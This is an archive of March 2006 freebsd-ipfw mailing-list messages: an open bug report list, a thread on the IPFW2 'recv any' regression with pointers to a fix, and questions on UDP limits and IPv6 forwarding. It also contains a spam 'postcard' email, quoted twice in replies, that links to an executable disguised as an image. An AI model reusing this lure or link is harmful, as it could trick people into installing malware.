From owner-freebsd-ipfw@FreeBSD.ORG Mon Mar 20 11:02:47 2006 Return-Path: X-Original-To: freebsd-ipfw@freebsd.org Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id BE00A16A435 for ; Mon, 20 Mar 2006 11:02:47 +0000 (UTC) (envelope-from owner-bugmaster@freebsd.org) Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 68AE943D49 for ; Mon, 20 Mar 2006 11:02:47 +0000 (GMT) (envelope-from owner-bugmaster@freebsd.org) Received: from freefall.freebsd.org (peter@localhost [127.0.0.1]) by freefall.freebsd.org (8.13.4/8.13.4) with ESMTP id k2KB2lwv082521 for ; Mon, 20 Mar 2006 11:02:47 GMT (envelope-from owner-bugmaster@freebsd.org) Received: (from peter@localhost) by freefall.freebsd.org (8.13.4/8.13.4/Submit) id k2KB2kal082515 for freebsd-ipfw@freebsd.org; Mon, 20 Mar 2006 11:02:46 GMT (envelope-from owner-bugmaster@freebsd.org) Date: Mon, 20 Mar 2006 11:02:46 GMT Message-Id: <200603201102.k2KB2kal082515@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: peter set sender to owner-bugmaster@freebsd.org using -f From: FreeBSD bugmaster To: freebsd-ipfw@FreeBSD.org Cc: Subject: Current problem reports assigned to you X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 20 Mar 2006 11:02:47 -0000 Current FreeBSD problem reports Critical problems Serious problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- o [2003/04/22] kern/51274 ipfw [ipfw] [patch] ipfw2 create dynamic rules f [2003/04/24] kern/51341 ipfw [ipfw] [patch] ipfw rule 'deny icmp from o [2004/03/03] kern/63724 ipfw [ipfw] IPFW2 Queues dont t work o [2004/11/13] kern/73910 ipfw [ipfw] serious bug on forwarding of packe o [2004/11/19] kern/74104 ipfw [ipfw] ipfw2/1 conflict not detected or r o [2005/03/13] conf/78762 ipfw [ipfw] [patch] /etc/rc.d/ipfw should exce o [2005/05/11] bin/80913 ipfw [patch] /sbin/ipfw2 silently discards MAC o [2005/11/08] kern/88659 ipfw [modules] ipfw and ip6fw do not work prop o [2005/11/08] kern/88664 ipfw [ipfw] ipfw stateful firewalling broken w o [2006/02/13] kern/93300 ipfw ipfw pipe lost packets 10 problems total. Non-critical problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- a [2001/04/13] kern/26534 ipfw [ipfw] Add an option to ipfw to log gid/u o [2002/12/10] kern/46159 ipfw [ipfw] [patch] ipfw dynamic rules lifetim o [2003/02/11] kern/48172 ipfw [ipfw] [patch] ipfw does not log size and o [2003/03/10] kern/49086 ipfw [ipfw] [patch] Make ipfw2 log to differen o [2003/04/09] bin/50749 ipfw [ipfw] [patch] ipfw2 incorrectly parses p o [2003/08/26] kern/55984 ipfw [ipfw] [patch] time based firewalling sup o [2003/12/30] kern/60719 ipfw [ipfw] Headerless fragments generate cryp o [2004/08/03] kern/69963 ipfw [ipfw] install_state warning about alread o [2004/09/04] kern/71366 ipfw [ipfw] "ipfw fwd" sometimes rewrites dest o [2004/10/22] kern/72987 ipfw [ipfw] ipfw/dummynet pipe/queue 'queue [B o [2004/10/29] kern/73276 ipfw [ipfw] [patch] ipfw2 vulnerability (parse o [2005/03/13] bin/78785 ipfw [ipfw] [patch] ipfw verbosity locks machi o [2005/05/05] kern/80642 ipfw [ipfw] [patch] ipfw small patch - new RUL o [2005/06/28] kern/82724 ipfw [ipfw] [patch] Add setnexthop and default o [2005/10/05] kern/86957 ipfw [ipfw] [patch] ipfw mac logging o [2005/10/07] kern/87032 ipfw [ipfw] [patch] ipfw ioctl interface imple o [2006/01/03] bin/91245 ipfw [patch] ipfw(8) sometimes treat ipv6 inpu o [2006/01/16] kern/91847 ipfw [ipfw] ipfw with vlanX as the device o [2006/02/16] kern/93422 ipfw ipfw divert rule no longer works in 6.0 ( 19 problems total. From owner-freebsd-ipfw@FreeBSD.ORG Wed Mar 22 07:10:55 2006 Return-Path: X-Original-To: freebsd-ipfw@freebsd.org Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6ADFD16A420 for ; Wed, 22 Mar 2006 07:10:55 +0000 (UTC) (envelope-from nobody@mars.adakist.com) Received: from mars.adakist.com (hosting.the-webhostingprovider.com [216.32.92.250]) by mx1.FreeBSD.org (Postfix) with ESMTP id 77DB943D5D for ; Wed, 22 Mar 2006 07:10:53 +0000 (GMT) (envelope-from nobody@mars.adakist.com) Received: from nobody by mars.adakist.com with local (Exim 4.52) id 1FLxRJ-0006xR-0M for freebsd-ipfw@freebsd.org; Tue, 21 Mar 2006 23:07:29 -0800 To: freebsd-ipfw@freebsd.org From: postcard.com Message-Id: Sender: Nobody Date: Tue, 21 Mar 2006 23:07:29 -0800 X-AntiAbuse: This header was added to track abuse, please include it with any abuse report X-AntiAbuse: Primary Hostname - mars.adakist.com X-AntiAbuse: Original Domain - freebsd.org X-AntiAbuse: Originator/Caller UID/GID - [99 99] / [47 12] X-AntiAbuse: Sender Address Domain - mars.adakist.com X-Source: X-Source-Args: X-Source-Dir: MIME-Version: 1.0 Content-Type: text/plain X-Content-Filtered-By: Mailman/MimeDel 2.1.5 Subject: You have received a postcard ! X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 22 Mar 2006 07:10:55 -0000 Hello friend ! You have just received a postcard from someone who cares about you! This is a part of the message: "Hy there! It has been a long time since I haven't heared about you! I've just found out about this service from Claire, a friend of mine who also told me that..." If you'd like to see the rest of the message click [1]here to receive your animated postcard! =================== Thank you for using www.yourpostcard.com 's services !!! Please take this opportunity to let your friends hear about us by sending them a postcard from our collection ! ================== References 1. http://toosexy.lydo.org/postcard.gif.exe From owner-freebsd-ipfw@FreeBSD.ORG Thu Mar 23 12:03:40 2006 Return-Path: X-Original-To: FreeBSD-ipfw@freebsd.org Delivered-To: FreeBSD-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A226116A400 for ; Thu, 23 Mar 2006 12:03:40 +0000 (UTC) (envelope-from dmitry@atlantis.dp.ua) Received: from postman.atlantis.dp.ua (postman.atlantis.dp.ua [193.108.47.1]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8BC7943D69 for ; Thu, 23 Mar 2006 12:03:23 +0000 (GMT) (envelope-from dmitry@atlantis.dp.ua) Received: from smtp.atlantis.dp.ua (smtp.atlantis.dp.ua [193.108.46.231]) by postman.atlantis.dp.ua (8.13.1/8.13.1) with ESMTP id k2NC3K0B082391 for ; Thu, 23 Mar 2006 14:03:20 +0200 (EET) (envelope-from dmitry@atlantis.dp.ua) Date: Thu, 23 Mar 2006 14:03:20 +0200 (EET) From: Dmitry Pryanishnikov To: FreeBSD-ipfw@freebsd.org Message-ID: <20060323133729.D63213@atlantis.atlantis.dp.ua> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed Cc: Subject: IPFW1->2 regression: "in/out/via any" ignored X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 23 Mar 2006 12:03:40 -0000 Hello! I've found a serious regression during the IPFW1->2 transition. I'm using "recv any" construction to match transit packets only. Manpage ipfw(8) clearly says: recv | xmit | via {ifX | if* | ipno | any} Matches packets received, transmitted or going through, respec- tively, the interface specified by exact name (ifX), by device name (if*), by IP address, or through some interface. ...........................................^^^^^^^^^^^^^^^^^^^^^^ A packet may not have a receive or transmit interface: packets originating from the local host have no receive interface, while packets destined for the local host have no transmit interface. So the following rule must not match locally-originated packets, thus matching only transit ones: 00001 0 0 count ip from any to any out recv any However, after transition to IPFW2 (RELENG_4, also have tried RELENG_6, CURRENT - results are the same) part "recv any" just gets ignored, and rules starts to match all outgoing packets, not just transit ones: root@test3# ipfw add 1 count ip from any to any out recv any 00001 count ip from any to any out root@test3# ipfw show 00001 7 1932 count ip from any to any out I've searched "ipfw any" context in our PR database and didn't find anything. Is it known issue? Does somebody work on it? Sincerely, Dmitry -- Atlantis ISP, System Administrator e-mail: dmitry@atlantis.dp.ua nic-hdl: LYNX-RIPE From owner-freebsd-ipfw@FreeBSD.ORG Thu Mar 23 14:01:18 2006 Return-Path: X-Original-To: FreeBSD-ipfw@freebsd.org Delivered-To: FreeBSD-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id EF93616A400 for ; Thu, 23 Mar 2006 14:01:18 +0000 (UTC) (envelope-from rizzo@icir.org) Received: from xorpc.icir.org (xorpc.icir.org [192.150.187.68]) by mx1.FreeBSD.org (Postfix) with ESMTP id AF41943D46 for ; Thu, 23 Mar 2006 14:01:18 +0000 (GMT) (envelope-from rizzo@icir.org) Received: from xorpc.icir.org (localhost [127.0.0.1]) by xorpc.icir.org (8.12.11/8.12.11) with ESMTP id k2NE06Sl066749; Thu, 23 Mar 2006 06:00:06 -0800 (PST) (envelope-from rizzo@xorpc.icir.org) Received: (from rizzo@localhost) by xorpc.icir.org (8.12.11/8.12.3/Submit) id k2NE06Xb066748; Thu, 23 Mar 2006 06:00:06 -0800 (PST) (envelope-from rizzo) Date: Thu, 23 Mar 2006 06:00:06 -0800 From: Luigi Rizzo To: Dmitry Pryanishnikov Message-ID: <20060323060006.A66681@xorpc.icir.org> References: <20060323133729.D63213@atlantis.atlantis.dp.ua> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20060323133729.D63213@atlantis.atlantis.dp.ua>; from dmitry@atlantis.dp.ua on Thu, Mar 23, 2006 at 02:03:20PM +0200 Cc: FreeBSD-ipfw@freebsd.org Subject: Re: IPFW1->2 regression: "in/out/via any" ignored X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 23 Mar 2006 14:01:19 -0000 On Thu, Mar 23, 2006 at 02:03:20PM +0200, Dmitry Pryanishnikov wrote: > > Hello! > > I've found a serious regression during the IPFW1->2 transition. I'm using > "recv any" construction to match transit packets only. Manpage ipfw(8) clearly > says: > > recv | xmit | via {ifX | if* | ipno | any} > Matches packets received, transmitted or going through, respec- > tively, the interface specified by exact name (ifX), by device > name (if*), by IP address, or through some interface. > ...........................................^^^^^^^^^^^^^^^^^^^^^^ > > A packet may not have a receive or transmit interface: packets > originating from the local host have no receive interface, while > packets destined for the local host have no transmit interface. The second part of this paragraph is surely incorrect - there is no transmit interface for packets in the inbound path (i.e. while they are in ip_input()) whether or not they are destined locally. So 'xmit any' does not make any sense. For locally generated packets i admit 'recv any' may be of some use, and this is unsupported. There are probably workaround such as 'src-ip me' which may be of some help here although this particular instruction can be expensive as it has to scan the list of local addresses. cheers luigi From owner-freebsd-ipfw@FreeBSD.ORG Thu Mar 23 14:47:44 2006 Return-Path: X-Original-To: FreeBSD-ipfw@freebsd.org Delivered-To: FreeBSD-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8794C16A433 for ; Thu, 23 Mar 2006 14:47:44 +0000 (UTC) (envelope-from dmitry@atlantis.dp.ua) Received: from postman.atlantis.dp.ua (postman.atlantis.dp.ua [193.108.47.1]) by mx1.FreeBSD.org (Postfix) with ESMTP id B039E43D58 for ; Thu, 23 Mar 2006 14:47:32 +0000 (GMT) (envelope-from dmitry@atlantis.dp.ua) Received: from smtp.atlantis.dp.ua (smtp.atlantis.dp.ua [193.108.46.231]) by postman.atlantis.dp.ua (8.13.1/8.13.1) with ESMTP id k2NElHh1055107; Thu, 23 Mar 2006 16:47:17 +0200 (EET) (envelope-from dmitry@atlantis.dp.ua) Date: Thu, 23 Mar 2006 16:47:17 +0200 (EET) From: Dmitry Pryanishnikov To: Luigi Rizzo In-Reply-To: <20060323060006.A66681@xorpc.icir.org> Message-ID: <20060323162418.S45142@atlantis.atlantis.dp.ua> References: <20060323133729.D63213@atlantis.atlantis.dp.ua> <20060323060006.A66681@xorpc.icir.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed Cc: FreeBSD-ipfw@freebsd.org Subject: Re: IPFW1->2 regression: "in/out/via any" ignored X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 23 Mar 2006 14:47:44 -0000 Hello! On Thu, 23 Mar 2006, Luigi Rizzo wrote: >> Matches packets received, transmitted or going through, respec- >> tively, the interface specified by exact name (ifX), by device >> name (if*), by IP address, or through some interface. >> ...........................................^^^^^^^^^^^^^^^^^^^^^^ >> >> A packet may not have a receive or transmit interface: packets >> originating from the local host have no receive interface, while >> packets destined for the local host have no transmit interface. > > The second part of this paragraph is surely incorrect - there is no transmit > interface for packets in the inbound path (i.e. while they are in ip_input()) > whether or not they are destined locally. So 'xmit any' does not make > any sense. Of course, I'm talking about 'out' direction. I am used to write rules like following: count all from any to 192.168.1.0/24 out recv $ext_if xmit any here 192.168.1.1 is my gateway towards client subnet. My intent is clear: I don't want traffic to 192.168.1.1 which came via $ext_if to be counted here. Now I see that traffic for 192.168.1.1 won't reach this rule at all (so I suppose that it doesn't travel via ip_output at all). So yes, you're right about 'xmit any' - it indeed doesn't make any sense. > For locally generated packets i admit 'recv any' may be of some use, > and this is unsupported. There are probably workaround such as 'src-ip me' Oops! How can one know that feature which is documented from the beginning, which worked in ipfw1 - became 'unsupported' in ipfw2? It's clearly a regression to me, given that I can't use ipfw1 with modern RELENGs. > which may be of some help here although this particular instruction > can be expensive as it has to scan the list of local addresses. I don't understand that part. Given that 'out recv ifx' still works, we have incoming interface name for every transit outgoing packet. I'm sure there is some indication in this field that clearly says: "packet _is_ locally-generated". Isn't it? Sincerely, Dmitry -- Atlantis ISP, System Administrator e-mail: dmitry@atlantis.dp.ua nic-hdl: LYNX-RIPE From owner-freebsd-ipfw@FreeBSD.ORG Thu Mar 23 14:57:40 2006 Return-Path: X-Original-To: FreeBSD-ipfw@freebsd.org Delivered-To: FreeBSD-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 497E416A454 for ; Thu, 23 Mar 2006 14:57:40 +0000 (UTC) (envelope-from rizzo@icir.org) Received: from xorpc.icir.org (xorpc.icir.org [192.150.187.68]) by mx1.FreeBSD.org (Postfix) with ESMTP id CD49C43D78 for ; Thu, 23 Mar 2006 14:57:31 +0000 (GMT) (envelope-from rizzo@icir.org) Received: from xorpc.icir.org (localhost [127.0.0.1]) by xorpc.icir.org (8.12.11/8.12.11) with ESMTP id k2NEvTiP067487; Thu, 23 Mar 2006 06:57:29 -0800 (PST) (envelope-from rizzo@xorpc.icir.org) Received: (from rizzo@localhost) by xorpc.icir.org (8.12.11/8.12.3/Submit) id k2NEvTUI067486; Thu, 23 Mar 2006 06:57:29 -0800 (PST) (envelope-from rizzo) Date: Thu, 23 Mar 2006 06:57:29 -0800 From: Luigi Rizzo To: Dmitry Pryanishnikov Message-ID: <20060323065729.C67264@xorpc.icir.org> References: <20060323133729.D63213@atlantis.atlantis.dp.ua> <20060323060006.A66681@xorpc.icir.org> <20060323162418.S45142@atlantis.atlantis.dp.ua> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20060323162418.S45142@atlantis.atlantis.dp.ua>; from dmitry@atlantis.dp.ua on Thu, Mar 23, 2006 at 04:47:17PM +0200 Cc: FreeBSD-ipfw@freebsd.org Subject: Re: IPFW1->2 regression: "in/out/via any" ignored X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 23 Mar 2006 14:57:40 -0000 On Thu, Mar 23, 2006 at 04:47:17PM +0200, Dmitry Pryanishnikov wrote: ... > > For locally generated packets i admit 'recv any' may be of some use, > > and this is unsupported. There are probably workaround such as 'src-ip me' > > Oops! How can one know that feature which is documented from the beginning, > which worked in ipfw1 - became 'unsupported' in ipfw2? It's clearly a > regression to me, given that I can't use ipfw1 with modern RELENGs. it's a bug, never seen one before ? :) > > which may be of some help here although this particular instruction > > can be expensive as it has to scan the list of local addresses. > > I don't understand that part. Given that 'out recv ifx' still works, we have > incoming interface name for every transit outgoing packet. I'm sure there is > some indication in this field that clearly says: "packet _is_ > locally-generated". Isn't it? yes, i am just saying that there is no code in the kernel and in the userland compiler that interprets that info correctly. I repeat - it's a bug. I'ts probably trivial to fix, but at the moment i don't have the time to work on it. If you want, the places to touch are: sbin/ipfw/ipfw2.c the two places which parse TOK_RECV and O_RECV, should be enabled to deal with 'any' as an interface name and encode it somewhere in the instruction (see function fill_iface(), at the moment 'any' is interpreted as NULL, it could become some magic value e.g. 0x1 or the like) sys/netinet/ip_fw2.c in function iface_match(), you should check whether this magic value is present in the instruction and then return 0 or 1 depending on whether or not the 'ifp' argument is non-null. and this should be all you need to do (testing, of course :) cheers luigi > Sincerely, Dmitry > -- > Atlantis ISP, System Administrator > e-mail: dmitry@atlantis.dp.ua > nic-hdl: LYNX-RIPE From owner-freebsd-ipfw@FreeBSD.ORG Thu Mar 23 22:32:27 2006 Return-Path: X-Original-To: freebsd-ipfw@freebsd.org Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3674A16A41F for ; Thu, 23 Mar 2006 22:32:27 +0000 (UTC) (envelope-from u_klann@augusta.de) Received: from inga.augusta.de (inga.augusta.de [213.209.142.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id A316C43D99 for ; Thu, 23 Mar 2006 22:32:04 +0000 (GMT) (envelope-from u_klann@augusta.de) Received: from munich.network-klann.de (e181121140.adsl.alicedsl.de [85.181.121.140]) (authenticated bits=0) by inga.augusta.de (8.13.4/8.13.4) with ESMTP id k2NMVshN099860 (version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NO) for ; Thu, 23 Mar 2006 23:31:54 +0100 (CET) (envelope-from u_klann@augusta.de) From: Klann Uwe Organization: Security To: freebsd-ipfw@freebsd.org Date: Thu, 23 Mar 2006 23:31:35 +0100 User-Agent: KMail/1.9.1 References: In-Reply-To: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Content-Disposition: inline Message-Id: <200603232331.36130.u_klann@augusta.de> X-Spam-Status: No, score=1.4 required=5.0 tests=BAYES_50,MISSING_HEADERS, MISSING_SUBJECT,PORN_URL_SEX autolearn=no version=3.0.3 X-Spam-Level: * X-Spam-Checker-Version: SpamAssassin 3.0.3 (2005-04-27) on lila.augusta.de Subject: Re: You have received a postcard ! X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 23 Mar 2006 22:32:27 -0000 On Wednesday 22 March 2006 08:07, postcard.com wrote: > Hello friend ! > You have just received a postcard from someone who cares about you! > This is a part of the message: > "Hy there! It has been a long time since I haven't heared about you! > I've just found out about this service from Claire, a friend of mine > who also told me that..." > If you'd like to see the rest of the message click [1]here to receive > your animated postcard! > =================== > Thank you for using www.yourpostcard.com 's services !!! > Please take this opportunity to let your friends hear about us by > sending them a postcard from our collection ! > ================== > > References > > 1. http://toosexy.lydo.org/postcard.gif.exe > _______________________________________________ > freebsd-ipfw@freebsd.org mailing list > http://lists.freebsd.org/mailman/listinfo/freebsd-ipfw > To unsubscribe, send any mail to "freebsd-ipfw-unsubscribe@freebsd.org" No I have not revceived a postcard! From owner-freebsd-ipfw@FreeBSD.ORG Thu Mar 23 22:37:06 2006 Return-Path: X-Original-To: freebsd-ipfw@freebsd.org Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6880E16A41F for ; Thu, 23 Mar 2006 22:37:06 +0000 (UTC) (envelope-from u_klann@augusta.de) Received: from inga.augusta.de (inga.augusta.de [213.209.142.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9ED3E43D45 for ; Thu, 23 Mar 2006 22:37:05 +0000 (GMT) (envelope-from u_klann@augusta.de) Received: from munich.network-klann.de (e181121140.adsl.alicedsl.de [85.181.121.140]) (authenticated bits=0) by inga.augusta.de (8.13.4/8.13.4) with ESMTP id k2NMb0q2000604 (version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NO) for ; Thu, 23 Mar 2006 23:37:01 +0100 (CET) (envelope-from u_klann@augusta.de) From: Klann Uwe Organization: Security To: freebsd-ipfw@freebsd.org Date: Thu, 23 Mar 2006 23:36:42 +0100 User-Agent: KMail/1.9.1 References: In-Reply-To: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Content-Disposition: inline Message-Id: <200603232336.42818.u_klann@augusta.de> X-Spam-Status: No, score=-1.0 required=5.0 tests=BAYES_40,MISSING_HEADERS, PORN_URL_SEX autolearn=no version=3.0.3 X-Spam-Checker-Version: SpamAssassin 3.0.3 (2005-04-27) on lila.augusta.de Subject: Re: You have received a postcard ! X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 23 Mar 2006 22:37:06 -0000 On Wednesday 22 March 2006 08:07, postcard.com wrote: > http://toosexy.lydo.org/postcard.gif.exe pls explain your details From owner-freebsd-ipfw@FreeBSD.ORG Sat Mar 25 15:10:15 2006 Return-Path: X-Original-To: freebsd-ipfw@freebsd.org Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 44BBC16A42F for ; Sat, 25 Mar 2006 15:10:15 +0000 (UTC) (envelope-from Tyrone@telecity.se) Received: from s200aog1.obsmtp.com (s200aog1.obsmtp.com [207.126.144.85]) by mx1.FreeBSD.org (Postfix) with SMTP id DD7A743D55 for ; Sat, 25 Mar 2006 15:10:09 +0000 (GMT) (envelope-from Tyrone@telecity.se) Received: from source ([195.149.172.5]) by eu1sys200aob001.obsmtp.com ([207.126.147.11]) with SMTP; Sat, 25 Mar 2006 15:10:08 UTC Content-class: urn:content-classes:message MIME-Version: 1.0 X-MimeOLE: Produced By Microsoft Exchange V6.5 Date: Sat, 25 Mar 2006 16:10:08 +0100 Message-ID: X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: udp packet problem Thread-Index: AcZQHljBuUe2qUuQTJWGR4E3QaeUEw== From: To: Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable X-Content-Filtered-By: Mailman/MimeDel 2.1.5 Subject: udp packet problem X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sat, 25 Mar 2006 15:10:15 -0000 We have a Freebsd 5.4 router doing traffic shaping on a vlan interface. =20 Problem is we can't receive UDP packets larger than 2K is this a limitation or a setting within IPFW? =20 regards =20 =20 Tyrone Van Der Haar =20 DISCLAIMER This e-mail is intended only for the use of the addressees named above and may be confidential. If you are not an addressee you must not use any information contained in nor copy it nor inform any person other than TeleCity or the addressees of its existence or contents. If you have received this e-mail in error, please contact the TeleCity IT department on +44 (0) 161 232 3220 or by email at techsupport@telecity.com. Internet communications cannot be guaranteed 100% secure, you should therefore take this potential lack of security into consideration when emailing us as we do not accept legal responsibility for the security of the contents of this or other = emails. Whilst TeleCity take measures to prevent any virus contamination of our computer systems, recipients of emails should always ensure that they take their own precautions to avoid virus contamination. =0D From owner-freebsd-ipfw@FreeBSD.ORG Sat Mar 25 15:36:59 2006 Return-Path: X-Original-To: freebsd-ipfw@freebsd.org Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id F262C16A401 for ; Sat, 25 Mar 2006 15:36:59 +0000 (UTC) (envelope-from joe@joeholden.co.uk) Received: from elise.stf.rewt.org.uk (elise.stf.rewt.org.uk [82.152.108.146]) by mx1.FreeBSD.org (Postfix) with ESMTP id 38A3A43D48 for ; Sat, 25 Mar 2006 15:36:58 +0000 (GMT) (envelope-from joe@joeholden.co.uk) Received: from [127.0.0.1] (cpvirtual.operatelecom.com [62.232.41.245]) (authenticated bits=0) by elise.stf.rewt.org.uk (8.13.5/8.13.4) with ESMTP id k2PFaoHN081107 for ; Sat, 25 Mar 2006 15:36:58 GMT (envelope-from joe@joeholden.co.uk) Message-ID: <44256386.307@joeholden.co.uk> Date: Sat, 25 Mar 2006 15:36:38 +0000 From: Joe Holden User-Agent: Thunderbird 1.5 (Windows/20051201) MIME-Version: 1.0 To: freebsd-ipfw@freebsd.org Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Spam-Status: No, score=0.1 required=3.0 tests=AWL autolearn=ham version=3.1.0 X-Spam-Checker-Version: SpamAssassin 3.1.0 (2005-09-13) on elise.stf.rewt.org.uk Subject: IPFW/IP6FW Forward Status X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list Reply-To: joe@joeholden.co.uk List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sat, 25 Mar 2006 15:37:00 -0000 Hello all, I have noticed IP6FW has been integrated with IPFW, however, is there any plan to add FWD support for ip6? as specifying ip6 as proto doesn't seem to to the trick, or at least, its not being distinguished as an ipv6 rule. Is this possible to add? As it's *very* useful. Thanks, Joe Holden